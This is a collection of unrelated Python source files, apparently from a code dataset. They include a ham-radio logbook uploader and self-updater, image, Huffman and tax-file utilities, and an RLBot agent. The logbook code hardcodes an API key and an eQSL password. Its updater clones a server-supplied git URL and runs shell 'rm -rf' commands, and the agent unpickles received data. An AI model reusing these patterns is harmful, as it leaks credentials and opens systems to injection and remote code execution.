settingsDict\n self.std = std\n self.parrent_window = parent_window\n\n def send_qso_to_qrz(self):\n server_url_post = 'https://logbook.qrz.com/api'\n key_account = \"KEY=81FE-08CA-D97D-8709&\"\n action = \"ACTION=INSERT&ADIF=80mSSBRN6XC20140121UR4LGA0346\"\n # print (\"key+action\", key_account + action)\n response = requests.post(server_url_post, data=key_account + action)\n\n # print (\"send_to_qrz\", response.text)\n\n def run(self):\n\n api_url_eqsl = 'https://www.eQSL.cc/qslcard/importADIF.cfm?ADIFData=LinLog upload'\n data_qso_string = ''+str(self.recordObject['BAND'])+' '+str(self.recordObject['CALL'])+' '+str(self.recordObject['MODE'])+' '+str(self.recordObject['QSO_DATE'])+' '+str(self.recordObject['RST_RCVD'])+' '+str(self.recordObject['RST_SENT'])+' '+str(self.recordObject['TIME_ON'])+' '\n data_string_code_to_url = urllib.parse.quote(data_qso_string)\n user_pasword_eqsl = '&EQSL_USER='+self.settingsDict['eqsl_user']+'&EQSL_PSWD='+self.settingsDict['eqsl_password']\n #data_qso_string = 'ADIFData=LinLog%20upload%20%3CBAND%3A'+str(len(band))+'%3AC%3E'+str(band)+'%20%2D%20%3CCALL%3A'+str(len(call))+'%3AC%3'+str(call)+'%20%3CMODE%3A'+str(len(mode))+'%3AC%3E'+str(mode)+'%20%3CQSO%5FDATE%3A'+str(len(qso_date))+'%3AD%3E'+str(qso_date)+'%20%3CRST%5FRCVD%3A'+str(len(rst_rsvd))+'%3AC%3E'+str(rst_rsvd)+'%20%3CRST%5FSENT%3A'+str(len(rst_send))+'%3AC%3E'+str(rst_send)+'%20%2D%20%3CTIME%5FON%3A'+str(len(time_on))+'%3AC%3E'+str(time_on)+'%20%3CEOR%3E&EQSL_USER='+self.settingsDict['eqsl_user']+'&EQSL_PSWD='+self.settingsDict['eqsl_password']\n # print (\"end_qso_to_eqsl\", api_url_eqsl+data_string_code_to_url)\n\n request_eqsl = requests.get(api_url_eqsl+data_string_code_to_url+user_pasword_eqsl)\n\n if request_eqsl.status_code != 200:\n\n std.std().message(\"Can't send to eQSL\", \"\")\n # print(\"request_eqsl.status_code\", request_eqsl.status_code)\n else:\n soup = BeautifulSoup(request_eqsl.text, 'html.parser')\n response = soup.body.contents[0]\n # print (\"SOUP\", soup.body.contents[0].strip())\n if (response.find('Warning')!= -1) or (response.find('Error')!= -1):\n message = QMessageBox(self.parrent_window)\n #message.setFixedHeight(200)\n #message.setGeometry(500, 300, 1000, 500)\n message.setStyleSheet(\"font: 12px;\")\n message.setWindowTitle(\"Warning!\")\n message.setText(\"Can't send to eQSL.cc\")\n #message.setText(soup.body.contents[0].strip())\n message.setInformativeText(soup.body.contents[0].strip())\n message.setStandardButtons(QMessageBox.Ok)\n message.exec_()\n #print(request_eqsl.text)\n \n\n\n #request_eqsl = requests.get(\n # 'https://www.eQSL.cc/qslcard/importADIF.cfm?ADIFData=LinLog%20upload%20%3CADIF%5FVER%3A4%3E1%2E00%20%3CEOH%3E%20%3CBAND%3A3%3AC%3E30M%20%2D%20%3CCALL%3A6%3AC%3EWB4WXX%20%3CMODE%3A3%3AC%3ESSB%20%3CQSO%5FDATE%3A8%3AD%3E20010503%20%3CRST%5FRCVD%3A2%3AC%3E52%20%3CRST%5FSENT%3A2%3AC%3E59%20%2D%20%3CTIME%5FON%3A6%3AC%3E122500%20%3CEOR%3E&EQSL_USER=ur4lga&EQSL_PSWD=a9minx3m')\n\nclass check_update (QThread):\n\n def __init__(self, APP_VERSION, settingsDict, parrentWindow):\n super().__init__()\n self.version = APP_VERSION\n self.settingsDict = settingsDict\n self.parrent = parrentWindow\n\n\n def run(self):\n\n server_url_get = 'http://357139-vds-bastonsv.gmhost.pp.ua'\n path_directory_updater_app = \"/upd/\"\n\n action = server_url_get+path_directory_updater_app+self.version+\"/\"+self.settingsDict['my-call']\n flag = 0\n data_flag = 0\n try:\n response = requests.get(action)\n flag = 1\n except Exception:\n flag = 0\n\n if flag == 1:\n soup = BeautifulSoup(response.text, 'html.parser')\n try:\n version = soup.find(id=\"version\").get_text()\n git_path = soup.find(id=\"git_path\").get_text()\n date = soup.find(id=\"date\").get_text()\n data_flag = 1\n except Exception:\n std.std.message(self.parrent, \"You have latest version\", \"UPDATER\")\n self.parrent.check_update.setText(\"> Check update <\")\n self.parrent.check_update.setEnabled(True)\n if data_flag == 1:\n update_result = QMessageBox.question(self.parrent, \"LinuxLog | Updater\",\n \"Found new version \"+version+\" install it?\",\n buttons=QMessageBox.Yes | QMessageBox.No,\n defaultButton=QMessageBox.Yes)\n if update_result == QMessageBox.Yes:\n # print(\"Yes\")\n #try:\n self.parrent.check_update.setText(\"Updating\")\n adi_name_list = []\n for file in os.listdir():\n if file.endswith(\".adi\"):\n adi_name_list.append(file)\n rules_name_list = []\n for file in os.listdir():\n if file.endswith(\".rules\"):\n rules_name_list.append(file)\n # print(\"Rules name List:_>\", rules_name_list)\n # print(\"Adi name List:_>\", adi_name_list)\n home = expanduser(\"~\")\n # print(\"Home path:_>\", home)\n os.mkdir(home+\"/linuxlog-backup\")\n for i in range(len(adi_name_list)):\n os.system(\"cp '\"+adi_name_list[i]+\"' \"+home+\"/linuxlog-backup\")\n for i in range(len(rules_name_list)):\n os.system(\"cp '\" + rules_name_list[i] + \"' \" + home + \"/linuxlog-backup\")\n os.system(\"cp settings.cfg \" + home+\"/linuxlog-backup\")\n # archive dir\n if os.path.isdir(home+'/linlog-old'):\n pass\n else:\n os.system(\"mkdir \"+home+\"/linlog-old\")\n os.system(\"tar -cf \"+home+\"/linlog-old/linlog\"+version+\".tar.gz \" + home + \"/linlog/\")\n\n # delete dir linlog\n os.system(\"rm -rf \" + home + \"/linlog/\")\n # clone from git repository to ~/linlog\n os.system(\"git clone \" + git_path + \" \" + home + \"/linlog\")\n\n # copy adi and rules file from linuxlog-backup to ~/linlog\n for i in range(len(adi_name_list)):\n os.system(\"cp '\"+home+\"/linuxlog-backup/\" + adi_name_list[i] + \"' '\" + home + \"/linlog'\")\n for i in range(len(rules_name_list)):\n os.system(\"cp '\" + home + \"/linuxlog-backup/\" + rules_name_list[i] + \"' '\" + home + \"/linlog'\")\n\n # read and replace string in new settings.cfg\n\n file = open(home+\"/linlog/settings.cfg\", \"r\")\n settings_list = {}\n for configstring in file:\n if configstring != '' and configstring != ' ' and configstring[0] != '#':\n configstring = configstring.strip()\n configstring = configstring.replace(\"\\r\", \"\")\n configstring = configstring.replace(\"\\n\", \"\")\n splitString = configstring.split('=')\n settings_list.update({splitString[0]: splitString[1]})\n file.close()\n for key_new in settings_list:\n for key_old in self.settingsDict:\n if key_new == key_old:\n settings_list[key_new] = self.settingsDict[key_old]\n\n\n\n # print(\"settings list^_>\", settings_list)\n\n filename = home+\"/linlog/settings.cfg\"\n with open(filename, 'r') as f:\n old_data = f.readlines()\n for index, line in enumerate(old_data):\n key_from_line = line.split('=')[0]\n # print (\"key_from_line:\",key_from_line)\n for key in settings_list:\n\n if key_from_line == key:\n # print(\"key\",key , \"line\", line)\n old_data[index] = key + \"=\" + settings_list[key] + \"\\n\"\n with open(filename, 'w') as f:\n f.writelines(old_data)\n # done!\n\n #delete backup dir\n os.system(\"rm -rf \" + home + \"/linuxlog-backup\")\n\n std.std.message(self.parrent, \"Update to v.\"+version+\" \\nCOMPLITED \\n \"\n \"Please restart LinuxLog\", \"UPDATER\")\n self.version = version\n self.parrent.check_update.setText(\"> Check update <\")\n self.parrent.check_update.setEnabled(True)\n self.parrent.text.setText(\"Version:\"+version+\"\\n\\nBaston Sergey\\nbastonsv@gmail.com\")\n\n\n else:\n # print(\"No\")\n self.parrent.check_update.setText(\"> Check update <\")\n self.parrent.check_update.setEnabled(True)\n\n else:\n std.std.message(self.parrent, \"Sorry\\ntimeout server.\", \"UPDATER\")\n\n","sub_path":"internetworker.py","file_name":"internetworker.py","file_ext":"py","file_size_in_byte":13053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"394654429","text":"# Copyright 2022 Sipeed Technology Co., Ltd. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom PIL import Image\nimport os,sys\nimport numpy as np\n\ndef mkdir(path):\n path = path.strip()\n path = path.rstrip(\"\\\\\")\n isExists = os.path.exists(path)\n if not isExists:\n os.makedirs(path)\n return True\n else:\n return False\n\ndef print_usage():\n print(\"Usage: python3 resize_img.py in_dir out_dir size\")\n print(\" size: 224,224,3\")\n\n# python3 resize_img.py imagenet quant_imagenet 224,224,3\nif __name__ == '__main__':\n if len(sys.argv) != 4:\n print_usage()\n exit()\n\n in_dir = sys.argv[1]\n out_dir = sys.argv[2]\n size = sys.argv[3]\n size = size.split(\",\")\n size = [int(i) for i in size]\n dst_h = size[0]\n dst_w = size[1]\n dst_ch = size[2]\n \n files = os.listdir(in_dir)\n mkdir(out_dir)\n\n for f in files:\n if f[-4:] != \".jpg\" and f[-4:] != \".png\" and f[-4:] != \".bmp\" and f[-4:] != \".ppm\" and f[-4:] != \".pgm\" and f[-5:] != \".JPEG\":\n continue \n f1 = in_dir+\"/\"+f \n img = Image.open(f1)\n src_w = img.size[0]\n src_h = img.size[1]\n src_ch= img.layers\n #if dst_w/dst_h > src_w/src_h:\n img = img.resize((dst_w, dst_h), Image.ANTIALIAS)\n if dst_ch != src_ch:\n if dst_ch==3 and src_ch==1:\n img0 = np.array(img)\n img1 = np.zeros((dst_h,dst_w,dst_ch))\n img1[:,:,0]=img0;img1[:,:,1]=img0;img1[:,:,2]=img0\n img = Image.fromarray(img1.astype(np.uint8))\n elif dst_ch==1 and src_ch==3:\n img = np.array(img)\n img = img.mean(axis=2)\n img = Image.fromarray(img.astype(np.uint8))\n else:\n print(\"can't support ch %d -> %d\"%(src_ch, dst_ch))\n exit()\n img.save(out_dir+\"/\"+f.split(\".\")[-2]+\".jpg\")\n print(out_dir+\"/\"+f.split(\".\")[-2]+\".jpg\")\n print(\"Done!\")\n\n\n\n\n\n","sub_path":"components/ai/TinyMaix/tools/resize_img.py","file_name":"resize_img.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"189440372","text":"from heapq import *\nfrom collections import Counter\n\n\nclass Node(object):\n\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n def __repr__(self):\n return \"DATA: {}\".format(self.data)\n\n\n# Step 1\ndef countOccurances(text):\n return Counter(text).items()\n\n\n# Step 2\ndef createPriorityQueue(text):\n data = countOccurances(text)\n pq = []\n\n for each in data:\n heappush(\n pq, (\n (each[1], Node(each)) # (4, DATA: ('s', 4))\n )\n )\n return pq\n\n\n# Step 3 b\ndef createParent(min1, min2):\n parent = Node(\"parent\")\n parent.left = min1\n parent.right = min2\n\n data = (min1[0] + min2[0], parent)\n\n '''\n \n print \"data = \",data\n print \"data.left = \", data[1].left\n print \"data.right = \", data[1].right\n print \"\\n\"\n '''\n\n return data\n\n\n# Step 3 a\ndef createhuffmantree(pq):\n while (len(pq)) != 1:\n min1 = heappop(pq)\n min2 = heappop(pq)\n parent = createParent(min1, min2)\n heappush(pq, parent)\n return pq\n\n\ndef traverseTree(parent):\n d = {}\n decompression = {}\n\n traverseTreeHelper(parent, [], d, decompression)\n return [d, decompression]\n\n\ndef traverseTreeHelper(node, prefix, d, decompression):\n if node[1].left == None and node[1].right == None:\n # print prefix, node[1].data[0]\n d[node[1].data[0]] = \"\".join(map(str, prefix[:]))\n\n decompression[\"\".join(map(str, prefix[:]))] = node[1].data[0]\n else:\n\n choose = node[1].left\n prefix.append(0)\n traverseTreeHelper(choose, prefix, d, decompression)\n prefix.pop()\n\n choose = node[1].right\n prefix.append(1)\n traverseTreeHelper(choose, prefix, d, decompression)\n prefix.pop()\n\n\ndef returnCompressedBits(compression, text):\n compressedbits = []\n for each in text:\n compressedbits.append(compression[each])\n return \"\".join(compressedbits)\n\n\ndef reurnDecompressBits(decompression, compressedbits):\n tmp = \"\"\n data = []\n for each in compressedbits:\n tmp += each\n # print tmp\n if tmp in decompression:\n data.append(decompression[tmp])\n tmp = \"\"\n\n return \"\".join(data)\n\n\ndef main():\n text = \"mississippi\"\n parent = createhuffmantree(createPriorityQueue(text))[0]\n\n compression, decompression = traverseTree(parent)\n\n compressedbits = returnCompressedBits(compression, text)\n print\n \"encoded data = \", compressedbits\n\n decompressedbits = reurnDecompressBits(decompression, compressedbits)\n print\n \"decoded data = \", decompressedbits\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Archive/P/Graphs/huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"573847145","text":"from django.conf.urls import url\nfrom django.urls import path\nfrom . import views\n\n\napp_name = 'vehicles'\n\n\nurlpatterns = [\n path('', views.VehicleListView.as_view(), name='all'),\n path('(?P\\d+)/', views.VehicleDetailView.as_view(), name='detail'),\n path('create/', views.VehicleCreateView.as_view(), name='create'),\n path('update/(?P\\d+)/', views.VehicleUpdateView.as_view(), name='update'),\n path('delete/(?P\\d+)/', views.VehicleDeleteView.as_view(), name='delete'),\n # url(r'^search/$', views.search, name='search'),\n # url(r'^search/$', views.SearchFilterView.as_view(), name='search'),\n]\n\n\n\n\n\n","sub_path":"tms/vehicles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"543573420","text":"# -*- coding: utf8 -*-\nimport logging\nfrom os.path import join\n\nimport yaml\nfrom frigg_test_discovery import detect_test_tasks\n\nlogger = logging.getLogger(__name__)\n\n\ndef build_tasks(directory, docker):\n return detect_test_tasks(docker.list_files(directory))\n\n\ndef load_settings_file(path, docker):\n return yaml.load(docker.read_file(path))\n\n\ndef get_path_of_settings_file(directory, docker):\n if docker.file_exist(join(directory, '.frigg.yml')):\n return join(directory, '.frigg.yml')\n elif docker.file_exist(join(directory, '.frigg.yaml')):\n return join(directory, '.frigg.yaml')\n\n\ndef build_settings(directory, docker):\n path = get_path_of_settings_file(directory, docker)\n\n settings = {\n 'setup_tasks': [],\n 'tasks': [],\n 'webhooks': [],\n 'services': []\n }\n\n if path is not None:\n settings.update(load_settings_file(path, docker))\n else:\n settings['tasks'] = build_tasks(directory, docker)\n\n if len(settings['tasks']) == 0:\n raise RuntimeError('No tasks found')\n\n return settings\n\n\nclass CachedProperty(object):\n def __init__(self, func, name=None):\n self.func = func\n self.__doc__ = getattr(func, '__doc__')\n self.name = name or func.__name__\n\n def __get__(self, instance, type=None):\n if instance is None:\n return self\n res = instance.__dict__[self.name] = self.func(instance)\n return res\n\n\ncached_property = CachedProperty\n","sub_path":"frigg_worker/build_helpers.py","file_name":"build_helpers.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"435244161","text":"#!C:\\Python27\\python.exe\r\n# -*- coding: utf-8 -*-\r\nimport os\r\nimport sys\r\nLinhasExport = []\r\nLinhasExportC197 = []\r\nindC100 = 0\r\ndef main():\r\n\tglobal LinhasExport\r\n\tDiretorio = ''\r\n\ttry:\r\n\t\tDiretorio = os.path.abspath(sys.argv[1])\r\n\texcept Exception as e:\r\n\t\tDiretorio = os.path.abspath('.')\r\n\r\n\tfor Arq in os.listdir(Diretorio):\r\n\t\tif Arq.upper().endswith(\".TXT\") and not Arq.endswith(\"LinhasArquivo.txt\"):\r\n\t\t\tProcessaArquivo(os.path.abspath(Diretorio + '/' + Arq.encode(\"cp1252\")))\r\n\r\n\twith open('LinhasArquivo.txt','w') as ArquivoExport:\r\n\t\tfor linha in LinhasExport:\r\n\t\t\tArquivoExport.write('|'.join(linha) + '\\n')\r\n\r\n\twith open('LinhasArquivoC197.txt','w') as ArquivoExport:\r\n\t\tfor linha in LinhasExportC197:\r\n\t\t\tArquivoExport.write(linha)\r\n\r\ndef ProcessaArquivo(CaminhoArquivo):\r\n\tglobal LinhasExport\r\n\tglobal indC100\r\n\tglobal LinhasExportC197\r\n\twith open(CaminhoArquivo,'r') as ArquivoSped:\r\n\t\tLinhaC100 = []\r\n\t\tLinhaC170 = []\r\n\t\tNumInsert = 0\r\n\t\tIndIncluiNota = False\r\n\t\tNomeParam = ArquivoSped.name.replace('\\\\','/').split('/')[-1].split(\"_\")\r\n\t\tfor Linha in ArquivoSped:\r\n\t\t\tif Linha.startswith('|C100'):\r\n\t\t\t\tLinhaC100 = Linha.split('|')\r\n\t\t\t\t#print(LinhaC100)\r\n\t\t\t\tif LinhaC100[2] == '0':\r\n\t\t\t\t\tIndIncluiNota = True\r\n\t\t\t\t\tNumInsert = 0\r\n\t\t\t\t\tindC100 += 1\r\n\t\t\t\t\tLinhaC100 = [str(indC100), NomeParam[0],NomeParam[1],NomeParam[2],NomeParam[3], LinhaC100[4], LinhaC100[5], LinhaC100[7], LinhaC100[8], LinhaC100[9], LinhaC100[10], LinhaC100[11], LinhaC100[12], LinhaC100[22], LinhaC100[24]]\r\n\r\n\t\t\t\telse:\r\n\t\t\t\t\tIndIncluiNota = False\r\n\t\t\tif Linha.startswith('|C170') and IndIncluiNota == True:\r\n\t\t\t\tSplitLinha = Linha.split('|')\r\n\t\t\t\tSplitLinha = [SplitLinha[2], SplitLinha[3], SplitLinha[4], SplitLinha[5], SplitLinha[6], SplitLinha[7], SplitLinha[10], SplitLinha[11], SplitLinha[13], SplitLinha[15], SplitLinha[18]]\r\n\r\n\t\t\t\tLinhaC170 = LinhaC100 + SplitLinha\r\n\t\t\t\tNumInsert += 1\r\n\t\t\t\tLinhasExport.append(LinhaC170)\r\n\t\t\t\t#print(LinhaC170)\r\n\t\t\tif Linha.startswith('|C190') and IndIncluiNota == True and NumInsert == 0:\r\n\t\t\t\tSplitLinha = Linha.split('|')\r\n\t\t\t\tSplitLinha =[\r\n\t\t\t\t\t'' ,\r\n\t\t\t\t\t'C190' ,\r\n\t\t\t\t\t'' ,\r\n\t\t\t\t\t'' ,\r\n\t\t\t\t\t'' ,\r\n\t\t\t\t\tSplitLinha[5 ],\r\n\t\t\t\t\tSplitLinha[2 ],\r\n\t\t\t\t\tSplitLinha[3 ],\r\n\t\t\t\t\tSplitLinha[6 ],\r\n\t\t\t\t\tSplitLinha[7 ],\r\n\t\t\t\t\tSplitLinha[9 ]\r\n\t\t\t\t]\r\n\r\n\t\t\t\tLinhaC190 = LinhaC100 + SplitLinha\r\n\t\t\t\tLinhasExport.append(LinhaC190)\r\n\r\n\t\t\tif Linha.startswith('|C197') and IndIncluiNota == True:\r\n\t\t\t\tSplitLinha = str(indC100) + Linha\r\n\r\n\t\t\t\tLinhasExportC197.append(SplitLinha)\r\n\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"statoil/ProcessaArquivos.py","file_name":"ProcessaArquivos.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"220817103","text":"# MIT License\n#\n# Copyright (c) 2018 LHolten@Github Hytak#5125@Discord\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport os\nimport sys\nfrom rlbot.agents.base_agent import SimpleControllerState, BaseAgent\nfrom rlbot.matchcomms.common_uses.set_attributes_message import handle_set_attributes_message\nfrom rlbot.matchcomms.common_uses.reply import reply_to\nfrom queue import Empty\nimport pickle\n\npath = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.insert(0, path) # this is for first process imports\n\nfrom examples.levi.output_formatter import LeviOutputFormatter\nfrom examples.levi.input_formatter import LeviInputFormatter\n\n\nclass LeviAgent(BaseAgent):\n def __init__(self, name, team, index):\n super().__init__(name, team, index)\n sys.path.insert(0, path) # this is for separate process imports\n import torch\n self.torch = torch\n self.empty_controller = SimpleControllerState()\n self.model = None\n self.model_hex = None\n self.input_formatter = None\n self.output_formatter = None\n\n def initialize_agent(self):\n self.input_formatter = self.create_input_formatter()\n self.output_formatter = self.create_output_formatter()\n\n def get_output(self, packet):\n self.handle_messages()\n\n if not packet.game_info.is_round_active:\n return self.empty_controller\n if packet.game_cars[self.index].is_demolished:\n return self.empty_controller\n if not self.model:\n return self.empty_controller\n\n arr = self.input_formatter.create_input_array([packet])\n\n with self.torch.no_grad():\n tensors = [self.torch.from_numpy(x).float() for x in arr]\n assert (tensors[0].size() == (1, 3, 9))\n assert (tensors[1].size() == (1, 5))\n out_tensors = self.model.forward(*tensors)\n new_output, _ = (x.numpy() for x in out_tensors)\n # new_output, _, _, _ = (x.numpy() for x in out_tensors)\n\n mask = self.output_formatter.get_mask(packet)\n assert (mask.shape == (1, 13))\n\n controls = self.output_formatter.format_controller_output(new_output[0] * mask[0], packet)\n\n # game_info_state = GameInfoState(game_speed=3.0)\n # game_state = GameState(game_info=game_info_state)\n # self.set_game_state(game_state)\n\n return controls\n\n def create_input_formatter(self):\n return LeviInputFormatter(self.team, self.index)\n\n def create_output_formatter(self):\n return LeviOutputFormatter(self.index)\n\n def handle_messages(self):\n for i in range(100): # process at most 100 messages per tick.\n try:\n msg = self.matchcomms.incoming_broadcast.get_nowait()\n except Empty:\n break\n\n if handle_set_attributes_message(msg, self, allowed_keys=['model_hex']):\n reply_to(self.matchcomms, msg) # Let the sender know we've set the attribute.\n self.model = pickle.loads(bytes.fromhex(self.model_hex))\n else:\n # Ignore messages that are not for us.\n self.logger.debug(f'Unhandled message: {msg}')\n","sub_path":"agents/levi_training_agent/levi_training_agent.py","file_name":"levi_training_agent.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"279185802","text":"#!/u01/Djracula/.virtualenvs/bacula-glacier/bin/python\nimport argparse\nimport glacier\nfrom celery.result import AsyncResult\nimport json\n\nDEFAULT_CHUNK_SIZE = pow(1024, 3)\nDEFAULT_OUTPUT_PATH = \".\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-v\", \"--vault\", help=\"The Glacier Vault name\", required=True)\nparser.add_argument(\"-j\", \"--jobid\", help=\"Job ID. Supplying a Job ID of \\\"Any\\\" will process all completed jobs with status code \\\"Succeeded\\\". Similary, supplying a Job ID of \\\"inventory\\\" or \\\"archive\\\" will process any successfully completed job that are InventoryRerieval or ArchiveRetrieval respectively.\", required=True)\nparser.add_argument(\"-o\", \"--outputpath\", help=\"Path to store output\", default=DEFAULT_OUTPUT_PATH)\nparser.add_argument(\"-c\", \"--chunksize\", help=\"Size of the chunks to use for download. Only valid of the job is ArchiveRetrieval.\", default=DEFAULT_CHUNK_SIZE)\nparser.add_argument(\"-f\", \"--friendlyname\", help=\"Use friendly name for output file\", action=\"store_true\")\nparser.add_argument(\"-r\", \"--reprocessfailed\", help=\"Reprocess a failed download (reqires a failed parts list and the source failed file)\", action=\"store_true\")\nparser.add_argument(\"-s\", \"--failedsourcefile\", help=\"Path to the download failed file\")\nparser.add_argument(\"-l\", \"--failedlistfile\", help=\"Path to the file containing the failed parts list\")\n\nargs = parser.parse_args()\n\nchunksize = int(args.chunksize)\n\nif not glacier.is_power_of_2(chunksize):\n print(\"Chunksize \" + str(chunksize) + \" is not a power of two. The next closest power of two is \" + str(glacier.next_power_of_2(chunksize)))\n\nelse:\n if args.reprocessfailed:\n if (not args.failedsourcefile) or (not args.failedlistfile):\n print(\" a failed source file and a failed list file is required to reprocess a failed download\")\n else:\n if (args.jobid.lower() == \"any\") or (args.jobid.lower() == \"inventory\" ) or (args.jobid.lower() == \"archive\"):\n print(\"reprocessing requires a specific jobid\")\n else:\n try:\n with open(args.failedlistfile, \"r\") as retry_failed_list_file:\n retry_failed_list = json.load(retry_failed_list_file)\n\n if 'all' in retry_failed_list:\n print(\"The failed list indicates that all parts failed. Please re-download the entire file instead.\")\n else:\n new_failed_list = glacier.process_failed_job(args.jobid, chunksize, args.failedsourcefile, retry_failed_list)\n if new_failed_list:\n print(\"Errors detected in re-processing the file. Overwriting old failed list file with new failed list. Please try again with this list\")\n with open(args.failedlistfile, \"w\") as retry_failed_list_file:\n json.dump(new_failed_list, retry_failed_list_file)\n else:\n print(args.failedsourcefile + \" reprocessed successfully.\")\n except:\n raise\n \n else:\n failures = glacier.process_request(args.vault, args.jobid, chunksize, args.outputpath, args.friendlyname)\n if \"all\" in failures:\n print(\"Failed at processing multiple jobs. Please try again.\")\n else:\n for job in failures:\n if failures[job]:\n print(\"Failures detected for jobid \" + job + \". Writing failure list to file.\")\n with open(args.outputpath + \"/\" + job + \".failed_parts.json\", \"w\") as failurefile:\n try:\n json.dump(failures[job], failurefile)\n except:\n raise\n else:\n print(job + \" downloaded successfully.\")\n","sub_path":"process_job.py","file_name":"process_job.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"99745394","text":"class System(object):\r\n '''Identifies a set of fixtures that need to be processed\r\n\r\n System has a loose coupling with Components and Entities.\r\n '''\r\n components = []\r\n Catalog = {}\r\n\r\n def __new__(cls, name=None, components=[]):\r\n '''Add systems to the catalog'''\r\n name = cls.__name__ if name is None else name\r\n if name not in System.Catalog:\r\n system = super().__new__(cls)\r\n System.Catalog[name] = system\r\n else:\r\n system = System.Catalog[name]\r\n return system\r\n\r\n def __init__(self, name=None, components=[]):\r\n self.name = name\r\n if components:\r\n self.components = components\r\n\r\n def __repr__(self):\r\n cname = self.__class__.__name__\r\n name = self.name\r\n return '<{} {}>'.format(cname, name)\r\n\r\n @property\r\n def entities(self):\r\n ents = list(set(entity for component_cls in self.component_classes\r\n for entity in component_cls.Catalog.keys()\r\n if entity is not None))\r\n return ents\r\n\r\n @property\r\n def component_classes(self):\r\n return list(set(Component.ComponentTypes.get(component_name)\r\n for component_name in self.components\r\n if component_name in Component.ComponentTypes\r\n ))\r\n\r\n def get_components(self):\r\n '''Creates a dictionary of component classes'''\r\n\r\n def update(self, dt=None):\r\n raise NotImplemented('update has not been implemented')\r\n\r\n\r\nclass CombatSystem(System):\r\n '''\r\n >>> from ag.Entity import Entity\r\n >>> from ag.Component import Component\r\n >>> from ag.fixtures import Health, Damage\r\n >>> player = Entity('player')\r\n >>> skeleton = Entity('skeleton')\r\n >>> player.health = Health()\r\n >>> player.damage = Damage()\r\n >>> skeleton.health = Health()\r\n >>> skeleton.damage = Damage()\r\n\r\n >>> combat_sim = CombatSystem()\r\n >>> player.health.current\r\n 100\r\n >>> skeleton.health.current\r\n 100\r\n >>> combat_sim.update()\r\n\r\n >>> player.health.current\r\n 90\r\n >>> skeleton.health.current\r\n 1\r\n '''\r\n components = ['Health', 'Damage']\r\n def update(self, dt=None):\r\n '''Updates the relevant data'''\r\n entityA, entityB = self.entities\r\n entityA.health.current -= entityB.damage\r\n entityB.health.current -= entityA.damage\r\n\r\nif __name__ == '__main__':\r\n from doctest import testmod\r\n\r\n testmod()\r\n\r\n","sub_path":"archive/System.py","file_name":"System.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"332921148","text":"\ndef check_data(date):\n \"\"\" Функция для проверки правильности введения даты. Пока не полная\"\"\"\n # day1, mount1, year = input('Введте дату в числовом варианте: ').split('.')\n day1, mount1, year = date.split('.')\n year = int(year)\n\n day = {'01': 'Первое', '02': 'Второе', '03': 'Третье', '04': 'Четвертое', '05': 'Пятое', '06': 'Шестое',\n '07': 'Седьмое', '08': 'Восьмое', '09': 'Девятое', '10': 'Десятое', '11': 'Одинадцатое', '12': 'Двенадцатое',\n '13': 'Тринадцатое', '14': 'Четырнадцатое', '15': 'Пятнадцатое', '16': 'Шестнадцатое', '17': 'Семьнадцатое',\n '18': \"Восемьнадцатое\", '19': 'Девятнадцатое', '20': 'Двадцатое', '21': 'Двадцать первое',\n '22': 'Двадцать второе', '23': 'Двадцать третье', '24': 'Двадцать четвертое', '25': 'Двадцать пятое',\n '26': 'Двадцать шестое', '27': 'Двадцать седьмое', '28': 'Двадцать восьмое', '29': 'Двадцать девятое',\n '30': 'Тридцатое', '31': 'Тридцать первое'}\n\n mount = {'01': 'Январь', '02': 'Февраль', '03': 'Март', '04': 'Апрель', '05': 'Май', '06': 